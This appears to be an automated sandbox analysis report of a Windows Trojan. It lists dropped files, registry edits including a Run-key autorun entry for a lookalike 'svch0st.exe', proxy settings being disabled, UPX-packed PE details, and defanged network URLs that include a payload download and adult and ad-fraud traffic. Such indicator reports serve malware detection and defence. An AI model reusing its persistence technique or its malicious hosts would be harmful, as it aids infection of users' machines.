C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EY6YFA77.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5FM6I276.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1THAFJKQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\index[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJIU3XS6.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\c=n;dst=1;et=1484906153069;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[5].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\H49OIM3X.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)

Registry activity

The process %original file name%.exe:2956 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"EnableConsoleTracing" = "0"

"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process svch0st.exe:3196 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\kimiss.net]
"(Default)" = "63"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\onlylady.com]
"(Default)" = "63"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91438"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process svch0st.exe:2080 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\CHtmlDialog\International]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"ConsoleTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GuaZhuan" = "C:\Windows\system32\svch0st.exe -autorun"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:3204 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\iqiyi.com]
"(Default)" = "9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91282"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:3188 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:2632 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coinsns.com]
"(Default)" = "23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91375"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
6edfe80996b2416c3643b721283eaffb	c:\Windows\System32\svch0st.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Static Analysis

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.dywt.com.cn)
Language: English (United States)

Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.dywt.com.cn)Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	835584	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	839680	405504	401920	5.49657	3b03fbbee721c3061f8051e12edaa94f
.rsrc	1245184	12288	10240	2.95109	159dafcfa74215c605ccb8afdb287c26

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://update-10042197.cos.myqcloud.com/date/11.exe	101.226.211.139
hxxp://ap5.liuliangbao.cn/as/c/f8/	202.75.219.243
hxxp://ap5.liuliangbao.cn/as/2/h1/	202.75.219.243
hxxp://ap5.liuliangbao.cn/as/2/h3/	202.75.219.243
hxxp://ap5.liuliangbao.cn/redirect/CFGUpdate?number=6.5&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	202.75.219.243
hxxp://ap5.liuliangbao.cn/clt/jobid/4acb0cb2593b811134e592df6755ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0	202.75.219.243
hxxp://ap5.liuliangbao.cn/redirect/CFGUpdate?number=6.5&checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	202.75.219.243
hxxp://ap5.liuliangbao.cn/ts/f2.2/	202.75.219.243
hxxp://cltres3.liuliangbao.cn.w.kunlunar.com/clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	116.207.117.87
hxxp://cltres3.liuliangbao.cn.w.kunlunar.com/clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	116.207.117.87
hxxp://ap.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://ap5.liuliangbao.cn/as/2/h5/	202.75.219.243
hxxp://coolsitesur.cloudns.pro/bao-animalpornvideo-net.php	167.88.118.247
hxxp://zooxxxfree.com/
hxxp://gba.onlylady.com/ads6.php	106.3.135.108
hxxp://ap3.liuliangbao.cn/ts/f3.1/	61.153.104.59
hxxp://ap5.liuliangbao.cn/as/c/f11/	202.75.219.243
hxxp://hitslap.com/pupfurt.js	198.255.108.234
hxxp://pornvideo-box.com/trade	198.255.108.210
hxxp://vip0x055.ssl.rncdn5.com/js/marketplace.min.js
hxxp://steenbergen.web.ero-advertising.com/banads/view.php?spaceid=2168566
hxxp://e5233.a.akamaiedge.net/v_19rra3jt70.html?list=19rrkqccqe
hxxp://ads.trafficjunky.net/ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343911&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=56_1484906105906078_12799&uuid=48a9dec2-af58-42f3-8797-50cf1a156d48	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=50_1484906105921674_21386&uuid=ed52589f-2015-4c94-939d-10ca076c51c4	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1343921&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343931&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=29_1484906106070879_21559&uuid=003c6b87-acf8-41d3-a0d5-191629132b3d	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=54_1484906106090851_7210&uuid=32fa73d3-9003-473d-a39a-6a2fa13bac12	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1343941&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343951&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1331611&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=52_1484906106135386_5191&uuid=9382141a-68b6-409b-8dfe-9704cf9ba99c	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=55_1484906106204537_27019&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344011&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1344021&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=53_1484906106291540_30079&uuid=f6d622d2-74ce-4b18-9176-428ec07c8fc1	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=27_1484906106350967_9603&uuid=f262600c-ccdc-4fa0-a68a-ebaa6afeceec	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344031&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=28_1484906106403577_17845&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=53_1484906106522410_29323&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344041&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1344051&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=54_1484906106583286_7218&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=56_1484906106582962_12796&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=52_1484906106682039_8221&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=50_1484906106729452_21376&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://e5233.a.akamaiedge.net/js/player_v1/pcweb.wonder.js
hxxp://e5233.a.akamaiedge.net/js/player_v1/config/online.js
hxxp://n2.panthercdn.com/files/onlyladyomd_new2.php
hxxp://e5233.a.akamaiedge.net/js/lib/sea1.2.js
hxxp://e5233.a.akamaiedge.net/js/common/52ba69c7b1d54420bec46c52cec587c6.js
hxxp://ap.liuliangbao.cn/clt/config/GlobalConfig_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/1050f98c2359.swf
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=sunkuotest&tn=1484906108169&yhls=1573105147225&fuid=&juid=&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201&ver=&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1484906108170
hxxp://hm.e.shifen.com/hm.js?53b7374a63c37483e5dd97d78d9bb36e
hxxp://x.jd.com.gslb.qianxun.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback	106.39.169.66
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22346699
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22350506
hxxp://360.xdwscache.ourglb0.com/11.0.1.js?fa1c7fce79127597cbed202ea98aec2c
hxxp://hm.e.shifen.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&et=0&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=1570361624&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1&tt=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº
hxxp://ap.liuliangbao.cn/clt/config/cfg_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://d7m0tkf5tdvs9.cloudfront.net/static/ab77b6ea7f3fbf79.js
hxxp://atanx.alicdn.com.danuoyi.tbcache.com/t/tanxssp.js?_v=12	195.27.31.250
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/ugcBodanPlay_ver.js?3leiavi
hxxp://e5233.a.akamaiedge.net/js/pingback/qa.js
hxxp://e5233.a.akamaiedge.net/player/cupid/common/clear.swf?r=6yuxxr
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=piaoshhtestmayttf&des=find_Q_ready&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1238272289
hxxp://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat.zip?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://ap.liuliangbao.cn/clt/config/blhash_6.5.dat.zip
hxxp://a1294.w20.akamai.net/beacon.js
hxxp://share.n.shifen.com/push.js
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=piaoshhtestmayttf&job=ugcbodanplay&des=findpagebyjob&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&entry=Q.load&prj=qiyiV2&_=1776244267
hxxp://e5233.a.akamaiedge.net/js/pingback/iwt.js
hxxp://atanx.alicdn.com.danuoyi.tbcache.com/g/mm/tanx-cdn2/t/tanxssp.js?_v=12	195.27.31.250
hxxp://cs803.wac.systemcdn.net/jzt/libs/behavior/v2/behavior.js
hxxp://cs803.wac.systemcdn.net/jzt/temp/js/_J.1.2.min.js
hxxp://a1294.w20.akamai.net/b?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/20170119180153/common/common.js
hxxp://a1294.w20.akamai.net/b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=Ã£â‚¬Å Ã¦ËœÅ½Ã¦ËœÅ¸Ã¥Â¿â€”Ã¦â€žÂ¿Ã£â‚¬â€¹J-starÃ§Â»â€žÃ¥ÂË†Ã§Â»Æ’Ã¤Â¹Â Ã¥Â®Â¤Ã¦â€”Â¥Ã¥Â¸Â¸-Ã§â€ÂµÃ¨Â§â€ Ã¥â€°Â§-Ã©Â«ËœÃ¦Â¸â€¦Ã¨Â§â€ Ã©Â¢â€˜Ã¢â‚¬â€œÃ§Ë†Â±Ã¥Â¥â€¡Ã¨â€°Âº&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906109847
hxxp://s-b.360.cn/so/zz.gif?url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&sid=fa1c7fce79127597cbed202ea98aec2c&token=feaq1ccc7qfkcrer79911=2t7s5i9l7?
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=jingyitest1&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&ver=WIN 23,0,0,185&yhls=1485764902188&pla=11&mod=cn_s&tn=0.6147289201617241
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20161122/182321793893.swf
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=svrs&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=b7ec007eeb7742d5c4f169def66e0c67&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.11122033419087529
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/036300cf212b7b.swf
hxxp://e5233.a.akamaiedge.net/crossdomain.xml
hxxp://e5233.a.akamaiedge.net/ext/common/Tipdatavod_201610311735.xml?n=0.2173128924332559
hxxp://iqiyi.irs01.com/irt?_iwt_id=&_iwt_UA=UA-iqiyi-000001&jsonp=MTIY5MRC6L5L4AG3&_iwt_p1=&_iwt_p2=&_iwt_p3=&	106.38.178.170
